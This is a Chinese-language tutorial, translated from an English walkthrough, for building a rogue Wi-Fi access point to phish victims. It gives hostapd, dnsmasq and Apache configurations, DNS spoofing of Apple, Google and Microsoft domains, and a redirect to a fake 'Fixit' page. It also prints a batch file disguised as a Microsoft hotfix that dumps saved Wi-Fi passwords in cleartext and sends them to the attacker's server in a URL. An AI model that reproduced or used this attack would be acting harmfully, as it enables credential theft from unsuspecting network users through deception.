回归最本质的信息安全

从零开始搭建Fake AP

2017年7月21日发布

19,863
0
0

导语:五步教你搭建一个Fake AP。

使用的工具:

· hostapd(或airbase-ng)

· dnsmasq(或isc-dhcp-server)

· Apache2

· Nano或Vim

· grep

简介

Hostapd

要创建一个特定类型的接入点,无论是开放,WPA2个人,企业或业力攻击。

dnsmasq

轻量级DNS / DHCP服务器。它用于从机器中解析dns请求,还可以作为DHCP服务器为客户端分配IP地址。

Apache

作为客户端(受害者)的Web服务器。

可能使用apache的灵活性和特性的高级技术

注意:所有命令都以root身份执行。使用sudo,如果你是非root用户(标准用户)

安装:

确保安装了最新版本的工具:

apt update
apt install hostapd dnsmasq apache2

现在创建一个保存所有配置文件的目录

cd ~/Desktop
mkdir fakeap/

配置hostapd:

为保存的配置文件创建一个目录。打开终端并创建hostapd配置文件。

nano hostapd.conf
interface=<Your Fake AP interface>
driver=nl80211
ssid=<Desired AP Name>
hw_mode=g
channel=<Target AP Channel number>
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0

配置dnsmasq:

interface=<Fake AP Interface name>         # wlan0 with hostapd, at0 with airbase-ng
dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

参数解释:

dhcp-range=10.0.0.10,10.0.0.250,12h:          Client IP address will range from 10.0.0.10 to 10.0.0.250, Network subnet mask is 255.255.255.0 And default lease time is 12 hours.

dhcp-option=3,10.0.0.1:                       3 is code for Default Gateway followed by IP of D.G i.e. 10.0.0.1

dhcp-option=6,10.0.0.1:                       6 for DNS Server followed by IP address

第1步:启动伪AP

首先,杀死可能已经运行的麻烦的进程。

killall network-manager dnsmasq wpa_supplicant dhcpd

启动hostapd

hostapd /path/to/configuration/file.conf

第2步:启动dhcp服务器

在调试模式下,使用配置文件运行dnsmasq

语法:

dnsmasq -C /path/to/configuration/file.conf -d
dnsmasq - C dnsmasq .conf - d

可选配置

您可以为dnsmasq创建一个可选的fakehosts.conf文件,以便将目标网站流量重定向到所需的IP地址。它只会告诉客户target-site.com托管在我们的目标IP地址上。

vi fakehosts .conf
10.0.0.1    apple.com
10.0.0.1    google.com
10.0.0.1    android.clients.google.com
10.0.0.1    microsoft.com
10.0.0.1    android.com
10.0.0.1    apple.com
10.0.0.1    google.com
10.0.0.1    android.clients.google.com
10.0.0.1    microsoft.com
10.0.0.1    android.com

就这样。只需将带-H标志的文件传递给dnsmasq,并且这些站点的所有流量将会如果您希望攻击者针对某个网站或特定客户端,还可以包含fakehosts.conf以通过-H标志传递dns欺骗

dnsmasq - C dnsmasq .conf - H fakehosts .conf - d

第3步:配置apache2 webserver

Apache的Rewrite Engine允许我们随时操作Web请求。使用这种技术,我们可以与我们的受害者一起做一些东西。无论是Android,iOS设备,Windows计算机还是Mac。您可以设计您的apache网络服务器专门针对目标进行攻击,甚至可以定位到特定的操作系统版本。

酷,对吧?

为iOS 9.x客户端提供不同的攻击媒介,并针对iOS 10客户端进行不同的攻击 它只是工作!

在这里,我们的目标是Windows机器,因为它拥有最广泛的安装基础。所以,一个非常普遍的目标Windows是一个黑客。

编辑apache默认配置文件以配置重写功能。这将几乎任何包含子目录的URL重定向到我们的假AP页面。

打开apache的默认配置文件

nano /etc/apache2/sites-enabled/000-default

并在->添加到<directory>标签</ directory>之间的文件中输入行 。

请注意,我们正在添加一个名为/Fixit的目录作为例外。这是区分大小写的

<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
--> add    RewriteEngine On
--> add       RewriteCond  %{REQUEST_URI}  !^/Fixit
--> add          RewriteRule ^.*$ /Fixit/
</Directory>

使用您的社会工程技能,并制作网页来吸引用户下载并执行您的payload。您需要将index.html文件放在/var/www/html/Fixit/

启用mod_rewrite模块

a2enmod rewrite

您必须重新启动apache2才能更新配置。

service apache2 restart

第4步:向apache发出DNS请求

运行dnsspoof将简单地将所有HTTP(非HTTPS)请求重定向到我们的apache服务器,并且不会让受害者访问Internet(如果禁用IP转发)。

如果您在互联网访问的同时攻击目标域名,这可能不会有用。在这种情况下,请使用带dnsmasq的fakehosts.conf文件

但是现在我们没有提供互联网接入受害者,而是全部都是pwn'em。所以运行:

dnsspoof - i wlan0

第5步:钓鱼攻击

由于我们先前已经配置了DNS,域名解析都会解析到本地。Apache中的index.html下载链接指向我的自定义文件,如Microsoft-Windows-Hotfix.bat。这个批处理文件不会过于复杂,它不会被杀毒软件杀掉。

@echo off
SET mypath=%~dp0
netsh wlan export profile > nul
netsh wlan export profile key=clear > nul
setlocal enableextensions enabledelayedexpansion
set /a counter=0
set filecontent=
for %%b in (*.xml) do (
set /a counter=!counter! + 1
:: echo %%b
for /f "delims=" %%a in ('type "%mypath%%%b"') do (
set filecontent=!filecontent!%%a
)
)
echo !filecontent! > %filename%data.txt
@rem The next line is platform specific. Sometimes in a diff folder
"c:Program FilesInternet Exploreriexplore.exe" microsoftfix.com/"!filecontent!"

一旦受害者执行恶意的Wi-Fi密钥嗅探器,它将提取和解密WLAN配置文件,在受害者设备上打开Internet Explorer,并请求microsoftfix.com(我们的服务器),在URL传输中包含Wi-Fi密钥,请求之后存储在我们的apache日志(/var/logs/apache2/access.log)

结语

这个攻击比较粗糙,一点也不隐蔽,更隐蔽的方法在https://gumroad.com/l/nGMWf

本文翻译自https://rootsh3ll.com/ultimate-fake-access-point-walkthrough/,如若转载,请注明原文地址: http://www.4hou.com/technology/6754.html

点赞 0
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

愣娃

愣娃

这个人很懒,什么也没留下

发私信

发表评论